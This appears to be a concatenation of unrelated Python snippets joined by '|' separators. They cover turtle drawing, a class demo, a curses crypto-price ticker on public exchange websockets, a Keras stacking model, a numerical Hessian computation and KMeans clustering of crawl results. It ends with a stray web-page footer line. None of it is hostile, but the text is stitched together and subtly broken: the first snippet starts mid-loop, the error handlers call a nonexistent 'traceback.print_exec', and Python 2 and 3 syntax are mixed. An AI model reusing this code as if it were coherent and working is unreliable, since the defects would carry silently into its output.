color=random.choice(colors)
turtle.color(color)
x=x+5
turtle.forward(x)
turtle.right(170)
|
class testClass(object):
print "Creating New Class\n=================="
number=5
def __init__(self, string):
self.string = string
def printClass(self):
print "Number = %d"% self.number
print "String = %s"% self.string
tc = testClass("Five")
tc.printClass()
tc.number = 10
tc.string = "Ten"
tc.printClass()
|
import math
import json
import yaml
import curses
import traceback
import websocket
from pprint import pprint
from websocket import create_connection
from termcolor import colored
BASEURL_SHITMEX = 'wss://www.bitmex.com/realtime'
BASEURL_COINBASE = 'wss://ws-feed.pro.coinbase.com'
def coinbase_sock_connect():
ws = create_connection(BASEURL_COINBASE)
ws.send(json.dumps({
"type": "subscribe",
"product_ids": [
"BTC-USD"
],
"channels": [
# "full",
"ticker",
# "level2",
# "heartbeat",
{
"name": "ticker",
"product_ids": [
"BTC-USD"
]
}
]
}))
try:
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
win1 = curses.newwin(30, 30, 0, 0)
win1.border()
while True:
response = ws.recv()
if 'subscriptions' in response:
continue
side = yaml.safe_load(response)['side']
size = yaml.safe_load(response)['last_size']
price = yaml.safe_load(response)['price']
win1.addnstr(1, 2, price + ' ' + size, curses.A_BOLD)
win1.refresh()
ch = win1.getch()
if ch == ord('q'):
break
# win1.clear()
win1.clrtoeol()
# win1.clrtobot()
win1.refresh()
except:
traceback.print_exec()
finally:
win1.keypad(0)
#stdscr.keypad(0)
curses.echo()
curses.nocbreak()
curses.endwin()
'''
#print("{:20} {:20}".format(colored(price, colour), colored(size, colour)))
if side == 'buy':
colour = 'green'
else:
colour = 'red'
'''
def shitmex_sock_connect():
ws = create_connection(BASEURL_SHITMEX)
ws.send(json.dumps({"op": "subscribe", "args": ["trade:XBTUSD"]}))
while True:
response = ws.recv()
if 'action' in response and yaml.safe_load(response)['action'] == "partial":
print("Exiting the while loop, because \"action\":\"partial\"")
break
try:
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
win1 = curses.newwin(30, 30, 0, 0)
win1.border()
while True:
response=ws.recv()
if 'data' in response:
# timestamp = yaml.safe_load(response)['data'][0]['timestamp']
# symbol = yaml.safe_load(response)['data'][0]['symbol']
# side = yaml.safe_load(response)['data'][0]['side']
price = yaml.safe_load(response)['data'][0]['price']
size = yaml.safe_load(response)['data'][0]['size']
win1.addnstr(1, 2, str(price) + ' ' + str(size), curses.A_BOLD)
ch = win1.getch()
# win1.clear()
win1.clrtoeol()
ch = stdscr.getch()
if ch == ord('q'):
break
win1.refresh()
# win1.clrtobot()
# win1.refresh()
except:
traceback.print_exec()
finally:
win1.keypad(0)
#stdscr.keypad(0)
curses.echo()
curses.nocbreak()
curses.endwin()
# if int(math.ceil(size/1000)) < 2:
# print(colored('\u0916', colour, on_colour), end = "")
# else:
# for i in range(1,int(math.ceil(size/1000)),1):
# print(colored('\u0916', colour, on_colour), end = "")
#print("{:20} {:20}".format(colored(price, colour), colored(size, colour)))
#print("{:20} {:20} {:20} {:20} {:20}".format(colored(timestamp, colour), colored(symbol, colour), colored(side, colour), colored(price, colour), colored(size, colour)))
def main():
shitmex_sock_connect()
# coinbase_sock_connect()
if __name__ == "__main__":
main()
'''
if 'l2update' in response:
side = yaml.safe_load(response)['changes'][0][0]
price = yaml.safe_load(response)['changes'][0][1]
size = yaml.safe_load(response)['changes'][0][2]
if side == 'buy':
colour = 'green'
else:
colour = 'red'
print("{:20} {:20}".format(colored(price, colour), colored(size, colour)))
{
"type": "ticker",
"sequence": 10878578482,
"product_id": "BTC-USD",
"price": "9819.99",
"open_24h": "9986.55000000",
"volume_24h": "9451.26364659",
"low_24h": "9665.39000000",
"high_24h": "10077.11000000",
"volume_30d": "258888.13877306",
"best_bid": "9819.98",
"best_ask": "9819.99",
"side": "buy",
"time": "2019-09-23T18:39:41.195000Z",
"trade_id": 74476314,
"last_size": "0.01996233"
}
'''
|
#!/usr/bin/env python
#_*_coding:utf-8_*_
import re
import numpy as np
from sklearn.model_selection import StratifiedKFold
import tensorflow as tf
from tensorflow import keras
from tensorflow.python.keras.callbacks import EarlyStopping
def Second_Model_DNN_One_HOT(blend_train_data,blend_train_label,blend_test_data,blend_test_label,second_test_data):
input_dim = blend_train_data.shape[1]
output_dim = len(set(blend_train_label))
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(2 ** 12, activation="relu")(inputs)
x = keras.layers.Dropout(0.05, noise_shape=None, seed=None)(x)
x = keras.layers.Dense(2 ** 10, activation="relu")(x)
x = keras.layers.Dropout(0.05, noise_shape=None, seed=None)(x)
x = keras.layers.Dense(2 ** 8, activation="relu")(x)
x = keras.layers.Dropout(0.05, noise_shape=None, seed=None)(x)
x = keras.layers.Dense(2 ** 6, activation="relu")(x)
x = keras.layers.Dropout(0.05, noise_shape=None, seed=None)(x)
x = keras.layers.Dense(2 ** 4, activation="relu")(x)
x = keras.layers.Dropout(0.05, noise_shape=None, seed=None)(x)
x = keras.layers.Dense(2 ** 2, activation="relu")(x)
x = keras.layers.Dropout(0.05, noise_shape=None, seed=None)(x)
outputs = keras.layers.Dense(1, activation="sigmoid")(x)
model = keras.Model(inputs, outputs)
model.compile(
optimizer=keras.optimizers.SGD(learning_rate=0.05, momentum=0.9),
loss=keras.losses.BinaryCrossentropy(),
metrics=[keras.metrics.BinaryAccuracy(name="acc")],
)
batch_size = blend_train_data.shape[0]
train_dataset = tf.data.Dataset.from_tensor_slices((blend_train_data, blend_train_label)).batch(batch_size)
test_dataset = tf.data.Dataset.from_tensor_slices((blend_test_data, blend_test_label)).batch(batch_size)
test_dataset2 = tf.data.Dataset.from_tensor_slices((second_test_data)).batch(batch_size)
callbacks = [
EarlyStopping('val_acc', patience=100),
keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.01,
patience=100, min_lr=0.01)
]
history = model.fit(train_dataset, epochs=500, validation_data=test_dataset, callbacks=callbacks)
# Test the model on all available devices.
prediction1 = model.predict(test_dataset)
prediction2 = model.predict(test_dataset2)
return prediction1, prediction2
def DL_OHE(train_name, train_label, test_name,test_label,OneHot_Feature):
second_train_label_feature = []
for second_i in range(train_label.shape[0]):
pair = []
if train_label[second_i] == "1": # ARG continue
continue
if train_label[second_i] == "2": # VF
pair.append(1)
if train_label[second_i] == "3": # Negtive
pair.append(0)
for second_i3 in range(len(OneHot_Feature)):
if train_name[second_i] == OneHot_Feature[second_i3][0]:
pair.extend(OneHot_Feature[second_i3][1:])
break
second_train_label_feature.append(pair)
second_test_label_feature = []
for second_i in range(test_label.shape[0]):
pair = []
if test_label[second_i] == "1":
pair.append(0)
if test_label[second_i] == "2":
pair.append(1)
if test_label[second_i] == "3":
pair.append(0)
for second_i3 in range(len(OneHot_Feature)):
if test_name[second_i] == OneHot_Feature[second_i3][0]:
pair.extend(OneHot_Feature[second_i3][1:])
break
second_test_label_feature.append(pair)
#########
#########
second_train_label_feature = np.array(second_train_label_feature, dtype=float)
second_train_data = second_train_label_feature[:, 1:]
second_train_label = second_train_label_feature[:, 0]
second_train_label = second_train_label.astype(int)
second_train_data = second_train_data.astype(float)
second_test_label_feature = np.array(second_test_label_feature, dtype=float)
second_test_data = second_test_label_feature[:, 1:]
second_test_label = second_test_label_feature[:, 0]
second_test_label = second_test_label.astype(int)
second_test_data = second_test_data.astype(float)
print('Train Data:', second_train_data.shape)
print('Test Data:', second_test_data.shape)
final_blend_train = []
fianl_blend_test = []
k2 = 0
skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=10)
for blend_train_index, blend_test_index in skf.split(second_train_data, second_train_label):
blend_train_data, blend_train_label = second_train_data[blend_train_index], second_train_label[
blend_train_index]
blend_test_data, blend_test_label = second_train_data[blend_test_index], second_train_label[blend_test_index]
clf1_pred_proba, clf1_pred_proba2 = Second_Model_DNN_One_HOT(blend_train_data, blend_train_label,
blend_test_data,
blend_test_label, second_test_data)
for num_i in range(len(blend_test_label)):
pair = []
pair.append(blend_test_label[num_i])
pair.append(clf1_pred_proba[num_i])
final_blend_train.append(pair)
##############
for num_j in range(len(second_test_label)):
pair = []
pair.append(second_test_label[num_j])
pair.append(clf1_pred_proba2[num_j])
fianl_blend_test.append(pair)
k2 += 1
fianl_blend_test_mean = []
for num_k in range(int(len(fianl_blend_test) / 5)):
pair = []
pair.append(fianl_blend_test[num_k][0])
for num_q in range(1, len(fianl_blend_test[num_k])):
mean_num = (fianl_blend_test[num_k][num_q] + fianl_blend_test[num_k + len(second_test_label)][num_q] +
fianl_blend_test[num_k + len(second_test_label) * 2][num_q] +
fianl_blend_test[num_k + len(second_test_label) * 3][num_q] +
fianl_blend_test[num_k + len(second_test_label) * 4][num_q]) / 5
pair.append(mean_num[0])
fianl_blend_test_mean.append(pair)
y_score0 = []
for i in range(len(fianl_blend_test_mean)):
if float(fianl_blend_test_mean[i][1]) >= 0.5:
y_score0.append(1)
else:
y_score0.append(0)
second_test_label = list(second_test_label)
return final_blend_train, fianl_blend_test_mean |
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
import pandas as pd
import os
import ObjEval_ES_ILS as obj
import pylab as pl
import itertools
''' to compute all possible permutations
# using itertools.product()'''
def get_score(parameter, lib, res):
key = tuple(parameter)
return res[lib.index(key)]
def f(beta):
global Population, pnt, score
# todo 两个变量parameter和res,分别记录待计算的参数和已计算的值
_idx = Population.index(beta)
return pnt[_idx]
def f_1(beta, pos): # *loc 输入的是i,j i.e. 在哪两个方向上变化
_center = list(beta)
_epsilon = abs(0.01 * np.array(beta)) # todo 正式的code里epsilon是变化的,按array来定
for _ in range(len(_epsilon)):
_epsilon[_] = 0.0001 if _epsilon[_] < 0.0001 else _epsilon[_]
_left, _right = list(_center), list(_center)
_left[pos], _right[pos] = _left[pos] - _epsilon[pos], _right[pos] + _epsilon[pos]
_l_res = (f(_left) - f(beta)) / -_epsilon[pos]
_r_res = (f(_right) - f(beta)) / _epsilon[pos]
return _l_res, _r_res
def f_2(beta, loc):
d_1, d_2 = loc[0], loc[1]
_epsilon = abs(0.01 * np.array(beta))
for _ in range(len(_epsilon)):
_epsilon[_] = 0.0001 if _epsilon[_] < 0.0001 else _epsilon[_]
_left = list(beta) # 仅取前差分算
_left[d_2] -= _epsilon[d_2]
return (f_1(_left, d_1)[0] - f_1(beta, d_1)[0]) / -_epsilon[d_2] # 取前差分算
if __name__ == '__main__':
# set print out decimals
# np.set_printoptions(precision=3)
# * ---------------- Read Evaluation results ---------------- *
# read from evaluation results. Parameter evaluation result
evaluation_result = pd.read_excel(
os.path.join(os.path.dirname(__file__), 'objective value evaluation', 'Dec5',
'Iteration result for t value evaluation.xlsx'),
index_col=1)
pnt = list(-evaluation_result.penalty)
score = list(evaluation_result.score)
# * ---------------- Generate the values to evaluate ---------------- *
sway = 0.01
'''Generate the values to evaluate'''
possible_values = []
'''generate near values for B*'''
cnt = 0
# set optimum
# B_star = [-1., -0.036, 1.002, 0.108]
B_star = obj.B_star
# get epsilon
epsilon = abs(np.array(B_star) * sway) # 让epsilon为正
for i in range(len(B_star)):
_ = np.array([0, 0, 0, 0])
_[i] = 1
possible_values.append(list(np.array(B_star) + epsilon * _))
print('No. {}: {}, modified at position {}, + '.format(cnt, list(np.array(B_star) + epsilon * _), i))
cnt += 1
possible_values.append(list(np.array(B_star) - epsilon * _))
print('No. {}: {}, modified at position {}, - '.format(cnt, list(np.array(B_star) - epsilon * _), i))
cnt += 1
# second derivative会用到的near values
for i in range(len(B_star)):
Beta = list(B_star)
# set 'optimum' (即center value).二次导的时候递归计算会用到的value.
Beta[i] -= epsilon[i] # 二次导仅使用前差分算
print('\nCurrent beta: {}\n'.format(Beta))
# get epsilon
_epsilon = abs(np.array(Beta) * sway) # 让epsilon为正
for j in range(len(Beta)):
_ = np.array([0, 0, 0, 0])
_[j] = 1
possible_values.append(list(np.array(Beta) + _epsilon * _))
print('No. {}: {}, modified at position {}, + '.format(cnt, list(np.array(Beta) + _epsilon * _), j))
cnt += 1
possible_values.append(list(np.array(Beta) - _epsilon * _))
print('No. {}: {}, modified at position {}, - '.format(cnt, list(np.array(Beta) - _epsilon * _), j))
cnt += 1
# 最后加上B* 本身
possible_values.append(list(np.array(B_star)))
flag, duplicate_idx = 0, []
for i in range(len(possible_values)):
for j in range(len(possible_values)):
if j > i:
if possible_values[i] == possible_values[j]:
# print('Duplicate: {}: {} and {}: {}.'.format(i, possible_values[i], j, possible_values[j]))
duplicate_idx.append(j)
flag = 1
Population = [possible_values[i] for i in range(len(possible_values)) if i not in duplicate_idx]
# ---------------------------- Setup ------------------------- #
# set parameters
sway = 0.01
# set optimum
B_star = obj.B_star
# get epsilon
epsilon = abs(np.array(B_star) * sway) # 让epsilon为正
# calculate gradient
Gradient = []
# ---------------------------- Calculation ------------------------- #
# gradient
for i in range(len(B_star)):
Gradient.append(f_1(B_star, i))
# calculate second derivative
SecondDerivative = []
# second gradient
for i in range(len(B_star)):
temp = []
for j in range(len(B_star)):
temp.append(f_2(B_star, [i, j]))
SecondDerivative.append(temp)
Gradient = np.array(Gradient)
SecondDerivative = np.array(SecondDerivative)
# ---------------------------- calculate pesudo t value ------------------------- #
variance = np.linalg.inv(SecondDerivative)
std_err = np.sqrt(np.diag(variance))
# ---------------------------- print results ------------------------- #
print('The numerical gradient matrix: \n {}\n'.format(Gradient))
# print second derivatives
print('The Hessian matrix:\n {}'.format(SecondDerivative))
# print variance matrix
print('The variance matrix:\n {}'.format(variance)) |
import csv
from sklearn.cluster import KMeans
K = 5
data_arr = []
url_name_arr = []
MY_FILE = 'output.csv'
top_row = []
errors = {"HttpError": 1, "DNSLookupError": 2, "TimeoutError": 3, "Other": 4}
with open(MY_FILE, 'rb') as f:
reader = csv.reader(f)
for i, row in enumerate(reader):
if i == 0:
top_row = row
continue
data = []
for i, e in enumerate(row):
if i == 0:
url_name_arr.append(e)
elif '[' in e and ']' in e:
data.append(len(e) - 2)
elif str.isdigit(e):
data.append(int(e))
elif e in errors.keys():
data.append(errors[e])
else:
if "status" in top_row[i]:
data.append(500)
elif "flags" in top_row[i]:
data.append(0)
elif "number_of_tags" in top_row[i]:
data.append(1500)
elif "length" in top_row[i]:
data.append(2000)
elif "error_message" in top_row[i]:
data.append(0)
elif "error_type" in top_row[i]:
data.append(5)
if len(data) > 0:
data_arr.append(data)
top_row.append("Label")
output_file = open("clustered_output_" + str(K) + ".csv", "wb")
output_writer = csv.writer(output_file)
output_writer.writerow(top_row)
# computing K-Means with K (clusters)
estimator = KMeans(n_clusters=K)
centroids = estimator.fit_predict(data_arr)
labels = estimator.labels_
for k in range(K):
c = 0
for i in range(len(data_arr)):
if labels[i] == k:
c += 1
row = []
row.append(url_name_arr[i])
row = row + data_arr[i]
row.append(k)
output_writer.writerow(row)
print "Cluster " + str(k) + " size: " + str(c)
output_writer.writerow([])
output_writer.writerow(["Results"])
k = 0
for cluster_center in estimator.cluster_centers_:
row = ["Cluster"]
for c in cluster_center:
row.append(c)
row.append(k)
output_writer.writerow(row)
k += 1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.